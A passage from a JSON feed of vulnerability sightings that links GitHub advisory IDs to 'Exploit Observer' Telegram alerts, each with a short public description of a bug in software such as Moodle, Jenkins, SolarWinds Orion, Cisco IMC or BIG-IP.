"2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FF72-FF42-C3GW", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/3815", "content": "#ExploitObserverAlert\n\nGHSA-ff72-ff42-c3gw\n\nDESCRIPTION: Exploit Observer has 6 entries in 3 file formats related to GHSA-ff72-ff42-c3gw. Cross-site Scripting in github.com/greenpau/caddy-security", "creation_timestamp": "2024-02-21T14:40:22.000000Z"}, {"uuid": "845e31ed-7326-473e-9569-9f77ec7d0256", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MCQJ-7P29-9528", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/3814", "content": "#ExploitObserverAlert\n\nGHSA-mcqj-7p29-9528\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-mcqj-7p29-9528. MantisBT Host Header Injection vulnerability", "creation_timestamp": "2024-02-21T14:39:26.000000Z"}, {"uuid": "85677d67-9213-447f-a26c-f70bb835f374", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CP8M-H777-G4P3", "type": "seen", "source": "https://t.me/arpsyndicate/3803", "content": "#ExploitObserverAlert\n\nGHSA-cp8m-h777-g4p3\n\nDESCRIPTION: Exploit Observer has 5 entries in 3 file formats related to GHSA-cp8m-h777-g4p3. Improper Access Control in moodle", "creation_timestamp": "2024-02-21T14:21:39.000000Z"}, {"uuid": "7c25bcec-d83e-422a-86bf-ae53831b11ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XFG6-62PX-CXC2", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/3802", "content": "#ExploitObserverAlert\n\nGHSA-xfg6-62px-cxc2\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-xfg6-62px-cxc2. SQL injection in pgjdbc", "creation_timestamp": "2024-02-21T14:20:19.000000Z"}, {"uuid": "5d0e4336-cdcd-4305-b848-bae862a33f1f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7496-FGV9-XW82", "type": "seen", "source": "https://t.me/arpsyndicate/3756", "content": "#ExploitObserverAlert\n\nGHSA-7496-fgv9-xw82\n\nDESCRIPTION: Exploit Observer has 3 entries in 3 file formats related to GHSA-7496-fgv9-xw82. Unencrypted ingress/health traffic when using Wireguard transparent encryption", "creation_timestamp": "2024-02-21T13:11:29.000000Z"}, {"uuid": "ee4a0a5e-60a0-4146-aeda-d3f2baff8006", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F244-F9FC-W6FQ", "type": "seen", "source": "https://t.me/arpsyndicate/2249", "content": "#ExploitObserverAlert\n\nGHSA-f244-f9fc-w6fq\n\nDESCRIPTION: Exploit Observer has 2 entries related to GHSA-F244-F9FC-W6FQ. Multiple Jenkins plugins do not properly mask (i.e., replace with asterisks) credentials printed in the build log from Pipeline steps like sh and bat, when both of the following conditions are met:\n\nGHSS: 4.3", "creation_timestamp": "2023-12-29T12:28:26.000000Z"}, {"uuid": "8ac1d919-a935-46ed-aa47-cac8452bf93c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FJ3M-2R8F-M4X9", "type": "exploited", "source": "https://t.me/arpsyndicate/2248", "content": "#ExploitObserverAlert\n\nGHSA-fj3m-2r8f-m4x9\n\nDESCRIPTION: Exploit Observer has 6 entries related to GHSA-FJ3M-2R8F-M4X9. A certificate validation issue was addressed. This issue is fixed in iOS 16.7 and iPadOS 16.7, OS 17.0.1 and iPadOS 17.0.1, watchOS 9.6.3, macOS Ventura 13.6, watchOS 10.0.1. A malicious app may be able to bypass signature validation. Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 16.7.\n\nGHSS: 5.5", "creation_timestamp": "2023-12-29T12:23:29.000000Z"}, {"uuid": "dacfcf1b-0737-4982-b420-9b71231abc08", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VMC2-J3GF-MVPP", "type": "seen", "source": "https://t.me/arpsyndicate/2040", "content": "#ExploitObserverAlert\n\nGHSA-vmc2-j3gf-mvpp\n\nDESCRIPTION: Exploit Observer has 2 entries related to GHSA-VMC2-J3GF-MVPP. In telephony service, there is a possible missing permission check. This could lead to local denial of service with no additional execution privileges.\n\nGHSS: 5.5", "creation_timestamp": "2023-12-20T15:42:00.000000Z"}, {"uuid": "b91507d8-6876-4000-bfc2-06a3a1b31ea7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P8VH-85VC-66X9", "type": "seen", "source": "https://t.me/arpsyndicate/2038", "content": "#ExploitObserverAlert\n\nGHSA-p8vh-85vc-66x9\n\nDESCRIPTION: Exploit Observer has 8 entries related to GHSA-P8VH-85VC-66X9.\n\nGHSS: 4.3", "creation_timestamp": "2023-12-20T15:41:24.000000Z"}, {"uuid": "a766eefc-0a0d-4374-a365-64ab15604034", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FQPQ-36Q8-XC95", "type": "seen", "source": "https://t.me/arpsyndicate/2247", "content": "#ExploitObserverAlert\n\nGHSA-fqpq-36q8-xc95\n\nDESCRIPTION: Exploit Observer has 2 entries related to GHSA-FQPQ-36Q8-XC95. The Wholesale Market for WooCommerce WordPress plugin before 1.0.8 does not validate user input used to generate system path, allowing high privilege users such as admin to download arbitrary file from the server even when they should not be able to (for example in multisite)\n\nGHSS: 4.9", "creation_timestamp": "2023-12-29T12:14:28.000000Z"}, {"uuid": "6a85f4bb-1d4e-4d78-a46a-cf0883195562", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RCJW-44P8-PPJ6", "type": "seen", "source": "https://t.me/arpsyndicate/2049", "content": "#ExploitObserverAlert\n\nGHSA-rcjw-44p8-ppj6\n\nDESCRIPTION: Exploit Observer has 5 entries related to GHSA-RCJW-44P8-PPJ6.\n\nGHSS: 9.0", "creation_timestamp": "2023-12-20T15:45:20.000000Z"}, {"uuid": "8753cb63-7832-41c1-924a-459c638c3526", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PCGM-9VCP-6328", "type": "seen", "source": "https://t.me/arpsyndicate/2048", "content": "#ExploitObserverAlert\n\nGHSA-pcgm-9vcp-6328\n\nDESCRIPTION: Exploit Observer has 3 entries related to GHSA-PCGM-9VCP-6328.\n\nGHSS: 7.8", "creation_timestamp": "2023-12-20T15:44:49.000000Z"}, {"uuid": "f5d228b8-b192-461a-a184-7ec029b8aaa4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F9FQ-VJVH-779P", "type": "seen", "source": "https://t.me/arpsyndicate/2239", "content": "#ExploitObserverAlert\n\nGHSA-f9fq-vjvh-779p\n\nDESCRIPTION: Exploit Observer has 3 entries related to GHSA-F9FQ-VJVH-779P. HashiCorp vault-ssh-helper (github.com/hashicorp/vault-ssh-helper/helper) up to and including version 0.1.6 incorrectly accepted Vault-issued SSH OTPs for the subnet in which a host's network interface was located, rather than the specific IP address assigned to that interface. Fixed in 0.2.0.\n\nGHSS: 7.5", "creation_timestamp": "2023-12-29T11:04:59.000000Z"}, {"uuid": "2137fa53-bed2-45cc-ace1-9d03e20b78d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HHGR-RPP9-9WHW", "type": "seen", "source": "https://t.me/arpsyndicate/2237", "content": "#ExploitObserverAlert\n\nGHSA-hhgr-rpp9-9whw\n\nDESCRIPTION: Exploit Observer has 5 entries related to GHSA-HHGR-RPP9-9WHW. SolarWinds Orion Platform before 2020.2.4, as used by various SolarWinds products, installs and uses a SQL Server backend, and stores database credentials to access this backend in a file readable by unprivileged users. As a result, any user having access to the filesystem can read database login details from that file, including the login name and its associated password. Then, the credentials can be used to get database owner access to the SWNetPerfMon.DB database. This gives access to the data collected by SolarWinds applications, and leads to admin access to the applications by inserting or changing authentication data stored in the Accounts table of the database.", "creation_timestamp": "2023-12-29T10:47:41.000000Z"}, {"uuid": "c952c10c-0b8b-4c80-96e4-6cc8d0d8d32c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RG73-99G2-RP3J", "type": "seen", "source": "https://t.me/arpsyndicate/2236", "content": "#ExploitObserverAlert\n\nGHSA-rg73-99g2-rp3j\n\nDESCRIPTION: Exploit Observer has 4 entries related to GHSA-RG73-99G2-RP3J. Owl Labs Meeting Owl 5.2.0.15 allows attackers to activate Tethering Mode with hard-coded hoothoot credentials via a certain c 150 value.\n\nGHSS: 7.4", "creation_timestamp": "2023-12-29T10:37:33.000000Z"}, {"uuid": "74515fea-aba4-41a5-9e78-f5fb55cf5e93", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JMJ6-P2J9-68CP", "type": "seen", "source": "https://t.me/arpsyndicate/2235", "content": "#ExploitObserverAlert\n\nGHSA-jmj6-p2j9-68cp\n\nDESCRIPTION: Exploit Observer has 3 entries related to GHSA-JMJ6-P2J9-68CP. wildfly-elytron: possible timing attacks via use of unsafe comparator. A flaw was found in Wildfly-elytron. Wildfly-elytron uses java.util.Arrays.equals in several places, which is unsafe and vulnerable to timing attacks. To compare values securely, use java.security.MessageDigest.isEqual instead. This flaw allows an attacker to access secure information or impersonate an authed user.\n\nGHSS: 7.4", "creation_timestamp": "2023-12-29T10:32:24.000000Z"}, {"uuid": "3d4668e5-5dc2-4f21-9115-b30bb72274e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FXF5-C62C-5F69", "type": "seen", "source": "https://t.me/arpsyndicate/2234", "content": "#ExploitObserverAlert\n\nGHSA-fxf5-c62c-5f69\n\nDESCRIPTION: Exploit Observer has 6 entries related to GHSA-FXF5-C62C-5F69. A path traversal vulnerability found in Qlik Sense Enterprise for Windows for versions May 2023 Patch 3 and earlier, February 2023 Patch 7 and earlier, November 2022 Patch 10 and earlier, and August 2022 Patch 12 and earlier allows an unauthenticated remote attacker to generate an anonymous session. This allows them to transmit HTTP requests to unauthorized endpoints. This is fixed in August 2023 IR, May 2023 Patch 4, February 2023 Patch 8, November 2022 Patch 11, and August 2022 Patch 13.\n\nGHSS: 8.2", "creation_timestamp": "2023-12-29T10:28:32.000000Z"}, {"uuid": "62f30a8d-db1b-48c7-99ac-c361e19ae62c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RXH8-P4V2-M8HF", "type": "seen", "source": "https://t.me/arpsyndicate/2233", "content": "#ExploitObserverAlert\n\nGHSA-rxh8-p4v2-m8hf\n\nDESCRIPTION: Exploit Observer has 1 entries related to GHSA-RXH8-P4V2-M8HF. The improper neutralization of special elements in the CGI program of the Zyxel NAS326 firmware version V5.21(AAZF.14)C0 and NAS542 firmware version V5.21(ABAG.11)C0 could allow an authenticated attacker to execute some operating system (OS) commands by sending a crafted URL to a vulnerable device.\n\nGHSS: 8.8", "creation_timestamp": "2023-12-29T10:17:23.000000Z"}, {"uuid": "4d23535e-e575-4e79-a8ad-79106a24eae3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q7FR-VQHQ-V5XR", "type": "seen", "source": "https://t.me/arpsyndicate/2232", "content": "#ExploitObserverAlert\n\nGHSA-q7fr-vqhq-v5xr\n\nDESCRIPTION: Exploit Observer has 4 entries related to GHSA-Q7FR-VQHQ-V5XR. While investigating ARTEMIS-2964 it was found that the creation of advisory messages in the OpenWire protocol head of Apache ActiveMQ Artemis 2.15.0 bypassed policy based access control for the entire session. Production of advisory messages was not subject to access control in error.\n\nGHSS: 7.5", "creation_timestamp": "2023-12-29T10:10:58.000000Z"}, {"uuid": "c9825e6d-16ba-48b7-a74e-b80d981721d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H5MV-FV98-GQMQ", "type": "seen", "source": "https://t.me/arpsyndicate/2231", "content": "#ExploitObserverAlert\n\nGHSA-h5mv-fv98-gqmq\n\nDESCRIPTION: Exploit Observer has 3 entries related to GHSA-H5MV-FV98-GQMQ. A form validation endpoint in Play Framework Plugin executes the play command to validate a given input file.\n\nGHSS: 8.8", "creation_timestamp": "2023-12-29T10:06:54.000000Z"}, {"uuid": "1ede1d10-36f3-4b63-aa80-09f6f9979f29", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RRWX-6MF8-VC3J", "type": "seen", "source": "https://t.me/arpsyndicate/2230", "content": "#ExploitObserverAlert\n\nGHSA-rrwx-6mf8-vc3j\n\nDESCRIPTION: Exploit Observer has 2 entries related to GHSA-RRWX-6MF8-VC3J. Double Free vulnerability in virtualsquare picoTCP v1.7.0 and picoTCP-NG v2.1 in modules/pico_fragments.c in function pico_fragments_reassemble, allows attackers to execute arbitrary code.\n\nGHSS: 9.8", "creation_timestamp": "2023-12-29T10:03:12.000000Z"}, {"uuid": "65bca531-69ba-434e-b43f-2b0064d25ccc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W689-557M-2CVQ", "type": "seen", "source": "https://t.me/arpsyndicate/2229", "content": "#ExploitObserverAlert\n\nGHSA-w689-557m-2cvq\n\nDESCRIPTION: Exploit Observer has 4 entries related to GHSA-W689-557M-2CVQ. The malicious user is able to discover services in the internal network through webhook functionality. All installations accepting public traffic are affected.\n\nGHSS: 8.3", "creation_timestamp": "2023-12-29T09:59:12.000000Z"}, {"uuid": "51d2790d-5bc6-4d59-bc21-a0d99604af0a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CRFC-RR25-6WF2", "type": "seen", "source": "https://t.me/arpsyndicate/2227", "content": "#ExploitObserverAlert\n\nGHSA-crfc-rr25-6wf2\n\nDESCRIPTION: Exploit Observer has 7 entries related to GHSA-CRFC-RR25-6WF2. In append_to_verify_fifo_interleaved_ of stream_encoder.c, there is a possible out of bounds write due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-174302683\n\nGHSS: 5.5", "creation_timestamp": "2023-12-29T09:49:19.000000Z"}, {"uuid": "f37f9fa7-237d-44da-b580-ce6031d311f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FGGX-FRXQ-CPX8", "type": "seen", "source": "https://t.me/arpsyndicate/2226", "content": "#ExploitObserverAlert\n\nGHSA-fggx-frxq-cpx8\n\nDESCRIPTION: Exploit Observer has 1 entries related to GHSA-FGGX-FRXQ-CPX8. Use after free in Garbage Collection in Google Chrome prior to 119.0.6045.159 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)\n\nGHSS: 8.8", "creation_timestamp": "2023-12-29T09:34:06.000000Z"}, {"uuid": "af622559-0691-46ba-acbb-cac8b6043fb1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WF33-PGHC-9QMJ", "type": "seen", "source": "https://t.me/arpsyndicate/2224", "content": "#ExploitObserverAlert\n\nGHSA-wf33-pghc-9qmj\n\nDESCRIPTION: Exploit Observer has 4 entries related to GHSA-WF33-PGHC-9QMJ. Improper access control in Odoo Community 15.0 and earlier and Odoo Enterprise 15.0 and earlier allows remote authenticated users to trigger the creation of demonstration data, including user accounts with known credentials.\n\nGHSS: 7.1", "creation_timestamp": "2023-12-29T09:24:18.000000Z"}, {"uuid": "96038fb9-1c7f-4f0d-972b-9b360349f49f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CVG5-HJH8-246X", "type": "seen", "source": "https://t.me/arpsyndicate/2223", "content": "#ExploitObserverAlert\n\nGHSA-cvg5-hjh8-246x\n\nDESCRIPTION: Exploit Observer has 2 entries related to GHSA-CVG5-HJH8-246X. Improper condition check in some Intel(R) SPS firmware before version SPS_E3_06.00.03.300.0 may allow a privileged user to potentially enable denial of service via local access.\n\nGHSS: 4.4", "creation_timestamp": "2023-12-29T09:19:16.000000Z"}, {"uuid": "ebaa1903-dfce-4bac-afb9-011288fa7145", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RP8V-59GG-C7H6", "type": "seen", "source": "https://t.me/arpsyndicate/2221", "content": "#ExploitObserverAlert\n\nGHSA-rp8v-59gg-c7h6\n\nDESCRIPTION: Exploit Observer has 2 entries related to GHSA-RP8V-59GG-C7H6. Transient DOS due to reachable assertion in Modem during OSI decode scheduling.\n\nGHSS: 7.5", "creation_timestamp": "2023-12-29T09:09:28.000000Z"}, {"uuid": "ba22e9d7-e849-4140-af6d-7bbdef988f2a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GCQ4-64V6-P5PV", "type": "seen", "source": "https://t.me/arpsyndicate/2220", "content": "#ExploitObserverAlert\n\nGHSA-gcq4-64v6-p5pv\n\nDESCRIPTION: Exploit Observer has 2 entries related to GHSA-GCQ4-64V6-P5PV. Cross Site Scripting (XSS) vulnerability in Netgate pfSense v.2.7.0 allows a remote attacker to gain privileges via a crafted url to the status_logs_filter_dynamic.php page.\n\nGHSS: 5.4", "creation_timestamp": "2023-12-29T09:05:46.000000Z"}, {"uuid": "6f1309b6-cd3d-4a1e-bf71-d8f062b474ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FJC9-JW7G-7732", "type": "seen", "source": "https://t.me/arpsyndicate/2219", "content": "#ExploitObserverAlert\n\nGHSA-fjc9-jw7g-7732\n\nDESCRIPTION: Exploit Observer has 1 entries related to GHSA-FJC9-JW7G-7732. In International Color Consortium DemoIccMAX 79ecb74, there is an out-of-bounds read in the CIccPRMG::GetChroma function in IccProfLib/IccPrmg.cpp in libSampleICC.a.\n\nGHSS: 7.8", "creation_timestamp": "2023-12-29T09:01:49.000000Z"}, {"uuid": "5b5af14f-cae9-4092-858d-afa21395523a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F5VV-HCGF-XVXQ", "type": "seen", "source": "https://t.me/arpsyndicate/2217", "content": "#ExploitObserverAlert\n\nGHSA-f5vv-hcgf-xvxq\n\nDESCRIPTION: Exploit Observer has 5 entries related to GHSA-F5VV-HCGF-XVXQ. Orthanc before 1.12.0 allows authenticated users with access to the Orthanc API to overwrite arbitrary files on the file system, and in specific deployment scenarios allows the attacker to overwrite the configuration, which can be exploited to trigger Remote Code Execution (RCE).", "creation_timestamp": "2023-12-29T08:53:18.000000Z"}, {"uuid": "8690a5bc-ca98-46dd-9346-705aa6477287", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CQ97-7VRX-7CHG", "type": "seen", "source": "https://t.me/arpsyndicate/2215", "content": "#ExploitObserverAlert\n\nGHSA-cq97-7vrx-7chg\n\nDESCRIPTION: Exploit Observer has 2 entries related to GHSA-CQ97-7VRX-7CHG. A SQL injection vulnerability exists in the \u201cnotes view\u201d feature of the ScienceLogic SL1 that takes unsanitized user?controlled input and passes it directly to a SQL query. This allows for the injection of arbitrary SQL before being executed against the database.\n\nGHSS: 8.8", "creation_timestamp": "2023-12-29T08:37:34.000000Z"}, {"uuid": "959d196d-e7b7-408b-8d74-b59a306987ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RXG7-FJPH-P5J8", "type": "seen", "source": "https://t.me/arpsyndicate/2212", "content": "#ExploitObserverAlert\n\nGHSA-rxg7-fjph-p5j8\n\nDESCRIPTION: Exploit Observer has 4 entries related to GHSA-RXG7-FJPH-P5J8. Synaman v5.1 and below was discovered to contain weak file permissions which allows authenticated attackers to escalate privileges.\n\nGHSS: 7.8", "creation_timestamp": "2023-12-29T08:20:00.000000Z"}, {"uuid": "9ac8944e-ef81-47f1-8c7e-505e290054d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XVPP-HHFF-GP7V", "type": "seen", "source": "https://t.me/arpsyndicate/2184", "content": "#ExploitObserverAlert\n\nGHSA-xvpp-hhff-gp7v\n\nDESCRIPTION: Exploit Observer has 2 entries related to GHSA-XVPP-HHFF-GP7V. In WAGO Unmanaged Switch (852-111/000-001) in firmware version 01 an undocumented configuration interface without authorization allows an remote attacker to read system information and configure a limited set of parameters.\n\nGHSS: 9.1", "creation_timestamp": "2023-12-28T03:21:42.000000Z"}, {"uuid": "aab985ad-d79a-4bc1-b75f-95c12c301c62", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X989-52FC-4VR4", "type": "seen", "source": "https://t.me/arpsyndicate/3826", "content": "#ExploitObserverAlert\n\nGHSA-x989-52fc-4vr4\n\nDESCRIPTION: Exploit Observer has 4 entries in 3 file formats related to GHSA-x989-52fc-4vr4. Unencrypted traffic between pods when using Wireguard and an external kvstore", "creation_timestamp": "2024-02-21T15:00:41.000000Z"}, {"uuid": "8b77fb9b-571d-4a73-9ba8-10807efc9c82", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H7RR-PQ87-V2R8", "type": "seen", "source": "https://t.me/arpsyndicate/809", "content": "#ExploitObserverAlert\n\nGHSA-h7rr-pq87-v2r8\n\nDESCRIPTION: Exploit Observer has 4 entries related to GHSA-H7RR-PQ87-V2R8. The APDFL.dll contains a memory corruption vulnerability while parsing specially crafted PDF files. This could allow an attacker to execute code in the context of the current process.\n\nGHSS: 7.8", "creation_timestamp": "2023-11-30T09:22:28.000000Z"}, {"uuid": "d2c10a4d-0673-4c72-9b38-d262429c5413", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J683-V94G-H65C", "type": "seen", "source": "https://t.me/arpsyndicate/807", "content": "#ExploitObserverAlert\n\nGHSA-j683-v94g-h65c\n\nDESCRIPTION: Exploit Observer has 10 entries related to GHSA-J683-V94G-H65C. In BIG-IP starting in versions 17.0.0, 16.1.2.2, 15.1.5.1, 14.1.4.6, and 13.1.5 on their respective branches, a format string vulnerability exists in iControl SOAP that allows an authenticated attacker to crash the iControl SOAP CGI process or, potentially execute arbitrary code. In appliance mode BIG-IP, a successful exploit of this vulnerability can allow the attacker to cross a security boundary. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.\n\nGHSS: 9.9", "creation_timestamp": "2023-11-30T09:11:49.000000Z"}, {"uuid": "ffb8aa9c-ef9e-4f96-aec7-a2b76e88effc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C9G8-FGQ6-H2WG", "type": "seen", "source": "https://t.me/arpsyndicate/806", "content": "#ExploitObserverAlert\n\nGHSA-c9g8-fgq6-h2wg\n\nDESCRIPTION: Exploit Observer has 14 entries related to GHSA-C9G8-FGQ6-H2WG. A vulnerability in Cisco Integrated Management Controller (IMC) Supervisor, Cisco UCS Director, and Cisco UCS Director Express for Big Data could allow an unauthenticated, remote attacker to log in to the CLI of an affected system by using the SCP User account (scpuser), which has default user credentials. The vulnerability is due to the presence of a documented default account with an undocumented default password and incorrect permission settings for that account. Changing the default password for this account is not enforced during the installation of the product. An attacker could exploit this vulnerability by using the account to log in to an affected system. A successful exploit could allow the attacker to execute arbitrary commands with the privileges of the scpuser account. This includes full read and write access to the system's database.\n\nGHSS: 9.8", "creation_timestamp": "2023-11-30T09:06:50.000000Z"}, {"uuid": "ba9d62da-7e56-43b4-abbd-e3deece241d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5JJQ-8CVJ-V6M9", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/3753", "content": "#ExploitObserverAlert\n\nGHSA-5jjq-8cvj-v6m9\n\nDESCRIPTION: Exploit Observer has 3 entries in 3 file formats related to GHSA-5jjq-8cvj-v6m9. Cross-site Scripting in Serenity", "creation_timestamp": "2024-02-21T13:05:31.000000Z"}, {"uuid": "be2e9ed4-e575-4ff4-9d40-a9887c26d586", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W3Q8-M492-4PWP", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/3839", "content": "#ExploitObserverAlert\n\nGHSA-w3q8-m492-4pwp\n\nDESCRIPTION: Exploit Observer has 2 entries in 2 file formats related to GHSA-w3q8-m492-4pwp. Possibility to circumvent the invitation token expiry period", "creation_timestamp": "2024-02-21T15:19:51.000000Z"}, {"uuid": "16362b83-44a8-4571-9496-f4a0c4dfb6b0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VFPH-HJFV-CPV2", "type": "seen", "source": "https://t.me/arpsyndicate/3801", "content": "#ExploitObserverAlert\n\nGHSA-vfph-hjfv-cpv2\n\nDESCRIPTION: Exploit Observer has 6 entries in 3 file formats related to GHSA-vfph-hjfv-cpv2. Improper Restriction of Excessive Authentication Attempts in github.com/greenpau/caddy-security", "creation_timestamp": "2024-02-21T14:19:01.000000Z"}, {"uuid": "3d72b2f4-65bc-4667-8de3-3b567503a5e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4265-CCF5-PHJ5", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/3798", "content": "#ExploitObserverAlert\n\nGHSA-4265-ccf5-phj5\n\nDESCRIPTION: Exploit Observer has 4 entries in 3 file formats related to GHSA-4265-ccf5-phj5. Apache Commons Compress: OutOfMemoryError unpacking broken Pack200 file", "creation_timestamp": "2024-02-21T14:14:03.000000Z"}, {"uuid": "d333045c-fb81-4c55-bcf1-db171ebe106c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3QPQ-6W89-F7MX", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/3797", "content": "#ExploitObserverAlert\n\nGHSA-3qpq-6w89-f7mx\n\nDESCRIPTION: Exploit Observer has 3 entries in 3 file formats related to GHSA-3qpq-6w89-f7mx. Pimcore Host Header Injection in user invitation link", "creation_timestamp": "2024-02-21T14:12:47.000000Z"}, {"uuid": "9a6abdb3-8219-43f1-9f1e-d0ab107e8514", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JFRG-9HPQ-9HVP", "type": "seen", 